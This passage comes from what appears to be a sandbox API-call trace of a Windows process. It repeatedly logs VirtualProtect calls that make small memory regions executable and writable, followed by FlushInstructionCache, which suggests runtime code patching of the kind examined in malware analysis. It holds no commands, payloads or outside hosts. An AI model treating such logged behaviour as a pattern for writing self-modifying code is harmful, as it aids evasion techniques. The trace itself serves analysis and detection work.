lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.609] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.609] GetCurrentProcess () returned 0xffffffff [0095.609] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.609] GetCurrentProcess () returned 0xffffffff [0095.609] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.609] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.610] GetCurrentProcess () returned 0xffffffff [0095.610] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.610] GetCurrentProcess () returned 0xffffffff [0095.610] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.610] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.611] GetCurrentProcess () returned 0xffffffff [0095.611] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.611] GetCurrentProcess () returned 0xffffffff [0095.611] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.611] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.612] GetCurrentProcess () returned 0xffffffff [0095.612] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.612] GetCurrentProcess () returned 0xffffffff [0095.612] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.612] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.612] GetCurrentProcess () returned 0xffffffff [0095.612] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.612] GetCurrentProcess () returned 0xffffffff [0095.613] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.613] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.613] GetCurrentProcess () returned 0xffffffff [0095.613] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.613] GetCurrentProcess () returned 0xffffffff [0095.613] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.613] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.614] GetCurrentProcess () returned 0xffffffff [0095.614] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.614] GetCurrentProcess () returned 0xffffffff [0095.614] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.614] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.615] GetCurrentProcess () returned 0xffffffff [0095.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.615] GetCurrentProcess () returned 0xffffffff [0095.615] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.615] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.615] GetCurrentProcess () returned 0xffffffff [0095.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.616] GetCurrentProcess () returned 0xffffffff [0095.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.616] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.616] GetCurrentProcess () returned 0xffffffff [0095.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.616] GetCurrentProcess () returned 0xffffffff [0095.616] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.616] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.633] GetCurrentProcess () returned 0xffffffff [0095.634] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.634] GetCurrentProcess () returned 0xffffffff [0095.634] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.634] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.635] GetCurrentProcess () returned 0xffffffff [0095.635] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.636] GetAsyncKeyState (vKey=3) returned 0 [0095.636] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.636] CRetailMalloc_Alloc () returned 0xf52f308 [0095.636] memcpy (in: _Dst=0xb2a5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.636] memcpy (in: _Dst=0xf52f328, _Src=0x197724, _Size=0x18 | out: _Dst=0xf52f328) returned 0xf52f328 [0095.636] CRetailMalloc_Realloc () returned 0xf52f308 [0095.636] CRetailMalloc_Free () returned 0x1 [0095.636] GetCurrentProcess () returned 0xffffffff [0095.636] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.636] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.637] GetCurrentProcess () returned 0xffffffff [0095.637] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.637] GetCurrentProcess () returned 0xffffffff [0095.637] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.637] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.638] GetCurrentProcess () returned 0xffffffff [0095.638] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.638] GetCurrentProcess () returned 0xffffffff [0095.638] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.638] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.639] GetCurrentProcess () returned 0xffffffff [0095.639] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.639] GetCurrentProcess () returned 0xffffffff [0095.639] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.639] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.640] GetCurrentProcess () returned 0xffffffff [0095.640] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.640] GetCurrentProcess () returned 0xffffffff [0095.640] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.640] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.641] GetCurrentProcess () returned 0xffffffff [0095.641] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.641] GetCurrentProcess () returned 0xffffffff [0095.641] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.641] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.641] GetCurrentProcess () returned 0xffffffff [0095.641] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.641] GetCurrentProcess () returned 0xffffffff [0095.642] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.642] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.642] GetCurrentProcess () returned 0xffffffff [0095.642] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.642] GetCurrentProcess () returned 0xffffffff [0095.642] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.642] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.643] GetCurrentProcess () returned 0xffffffff [0095.643] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.643] GetCurrentProcess () returned 0xffffffff [0095.643] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.643] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.644] GetCurrentProcess () returned 0xffffffff [0095.644] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.644] GetCurrentProcess () returned 0xffffffff [0095.644] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.644] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.645] GetCurrentProcess () returned 0xffffffff [0095.645] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.645] GetCurrentProcess () returned 0xffffffff [0095.645] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.645] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.645] GetCurrentProcess () returned 0xffffffff [0095.645] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.645] GetCurrentProcess () returned 0xffffffff [0095.646] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.646] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.646] GetCurrentProcess () returned 0xffffffff [0095.646] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0095.646] GetCurrentProcess () returned 0xffffffff [0095.646] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0095.646] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.647] GetCurrentProcess () returned 0xffffffff [0095.647] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0095.647] GetCurrentProcess () returned 0xffffffff [0095.647] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0095.647] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.648] GetCurrentProcess () returned 0xffffffff [0095.648] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0095.648] GetCurrentProcess () returned 0xffffffff [0095.648] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0095.648] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.649] GetCurrentProcess () returned 0xffffffff [0095.649] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0095.649] GetCurrentProcess () returned 0xffffffff [0095.649] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0095.649] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.650] GetCurrentProcess () returned 0xffffffff [0095.650] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0095.650] GetCurrentProcess () returned 0xffffffff [0095.650] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0095.650] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.650] GetCurrentProcess () returned 0xffffffff [0095.651] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0095.651] GetCurrentProcess () returned 0xffffffff [0095.651] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0095.651] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.651] GetCurrentProcess () returned 0xffffffff [0095.651] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0095.651] GetCurrentProcess () returned 0xffffffff [0095.651] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0095.651] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.652] GetCurrentProcess () returned 0xffffffff [0095.652] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0095.652] GetCurrentProcess () returned 0xffffffff [0095.652] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0095.652] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.653] GetCurrentProcess () returned 0xffffffff [0095.653] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0095.653] GetCurrentProcess () returned 0xffffffff [0095.653] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0095.653] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.654] GetCurrentProcess () returned 0xffffffff [0095.654] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0095.654] GetCurrentProcess () returned 0xffffffff [0095.654] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0095.654] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.654] GetCurrentProcess () returned 0xffffffff [0095.654] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0095.654] GetCurrentProcess () returned 0xffffffff [0095.655] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0095.655] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.655] GetCurrentProcess () returned 0xffffffff [0095.655] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0095.655] GetCurrentProcess () returned 0xffffffff [0095.655] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0095.655] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.656] GetCurrentProcess () returned 0xffffffff [0095.656] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0095.656] GetCurrentProcess () returned 0xffffffff [0095.656] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0095.656] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.657] GetCurrentProcess () returned 0xffffffff [0095.657] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0095.657] GetCurrentProcess () returned 0xffffffff [0095.657] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0095.657] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.657] GetCurrentProcess () returned 0xffffffff [0095.657] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0095.658] GetCurrentProcess () returned 0xffffffff [0095.658] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0095.658] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.658] GetCurrentProcess () returned 0xffffffff [0095.658] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0095.658] GetCurrentProcess () returned 0xffffffff [0095.658] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0095.658] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.660] GetCurrentProcess () returned 0xffffffff [0095.660] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0095.660] GetCurrentProcess () returned 0xffffffff [0095.660] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0095.660] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.661] GetCurrentProcess () returned 0xffffffff [0095.661] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0095.661] GetCurrentProcess () returned 0xffffffff [0095.661] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0095.661] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.662] GetCurrentProcess () returned 0xffffffff [0095.662] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0095.662] GetCurrentProcess () returned 0xffffffff [0095.662] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0095.662] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.662] GetCurrentProcess () returned 0xffffffff [0095.662] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0095.663] GetAsyncKeyState (vKey=3) returned 0 [0095.663] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0095.664] CRetailMalloc_Alloc () returned 0xf52f368 [0095.664] memcpy (in: _Dst=0xb2a5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0095.664] memcpy (in: _Dst=0xf52f388, _Src=0x197724, _Size=0x18 | out: _Dst=0xf52f388) returned 0xf52f388 [0095.664] CRetailMalloc_Realloc () returned 0xf52f368 [0095.664] CRetailMalloc_Free () returned 0x1 [0095.664] GetCurrentProcess () returned 0xffffffff [0095.664] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0095.664] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.665] GetCurrentProcess () returned 0xffffffff [0095.665] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0095.665] GetCurrentProcess () returned 0xffffffff [0095.665] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0095.665] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.666] GetCurrentProcess () returned 0xffffffff [0095.666] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0095.666] GetCurrentProcess () returned 0xffffffff [0095.666] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0095.666] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.667] GetCurrentProcess () returned 0xffffffff [0095.667] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0095.667] GetCurrentProcess () returned 0xffffffff [0095.667] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0095.667] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.667] GetCurrentProcess () returned 0xffffffff [0095.667] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0095.667] GetCurrentProcess () returned 0xffffffff [0095.667] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0095.667] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.668] GetCurrentProcess () returned 0xffffffff [0095.668] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0095.668] GetCurrentProcess () returned 0xffffffff [0095.668] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0095.668] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.669] GetCurrentProcess () returned 0xffffffff [0095.669] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0095.669] GetCurrentProcess () returned 0xffffffff [0095.669] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0095.669] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.670] GetCurrentProcess () returned 0xffffffff [0095.670] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0095.670] GetCurrentProcess () returned 0xffffffff [0095.670] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0095.670] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.670] GetCurrentProcess () returned 0xffffffff [0095.670] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0095.670] GetCurrentProcess () returned 0xffffffff [0095.670] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0095.670] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.671] GetCurrentProcess () returned 0xffffffff [0095.671] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0095.671] GetCurrentProcess () returned 0xffffffff [0095.671] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0095.671] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.672] GetCurrentProcess () returned 0xffffffff [0095.672] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0095.672] GetCurrentProcess () returned 0xffffffff [0095.672] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0095.672] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.673] GetCurrentProcess () returned 0xffffffff [0095.673] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0095.673] GetCurrentProcess () returned 0xffffffff [0095.673] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0095.673] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0095.673] GetCurrentProcess () returned 0xffffffff [0095.673] FlushInstructionCache 